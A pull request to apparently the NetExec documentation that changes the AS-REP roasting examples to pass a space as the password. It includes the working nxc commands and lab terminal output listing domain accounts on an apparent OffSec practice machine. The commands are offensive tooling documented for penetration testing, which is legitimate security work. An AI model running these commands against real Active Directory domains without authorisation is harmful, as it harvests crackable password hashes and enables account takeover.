### PR TITLE
Update asreproast.md

### DIFF
--- a/ldap-protocol/asreproast.md
+++ b/ldap-protocol/asreproast.md
@@ -15,17 +15,17 @@ You can retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos p
 > The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS\_REQ request to the KDC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in [Kerberos theory](https://www.tarlogic.com/en/blog/how-kerberos-works/).
 
 ```bash
-nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
+nxc ldap 192.168.0.104 -u harry -p ' ' --asreproast output.txt
 ```
 
 Using a wordlist, you can find wordlists of username here
 
 ```bash
-nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
+nxc ldap 192.168.0.104 -u user.txt -p ' ' --asreproast output.txt
 ```
 
 {% hint style="info" %}
-Set the password value to '' to perform the test without authentication
+Set the password value to ' ' to perform the test without authentication
 {% endhint %}
 
 ### With authentication


### PR DESCRIPTION
As far as I understand, it actually needs to pass a space explicitly in the password field to make this work.

Without space (`-p ''`):
```bash
$ uv run nxc ldap hutch -u domain_users -p '' --asreproast asreproasted.lst
LDAP        192.168.195.122 389    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 (name:HUTCHDC) (domain:hutch.offsec) (signing:None) (channel binding:No TLS cert)
# Does not do anything
```
With space (`-p ' '`):
```bash
$ uv run nxc ldap hutch -u domain_users -p ' ' --asreproast asreproasted.lst
LDAP        192.168.195.122 389    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 (name:HUTCHDC) (domain:hutch.offsec) (signing:None) (channel binding:No TLS cert)
LDAP        192.168.195.122 389    HUTCHDC          [-] hutch.offsec\Administrator:
LDAP        192.168.195.122 389    HUTCHDC          [-] hutch.offsec\rplacidi:
LDAP        192.168.195.122 389    HUTCHDC          [-] hutch.offsec\opatry:
<SNIP>
```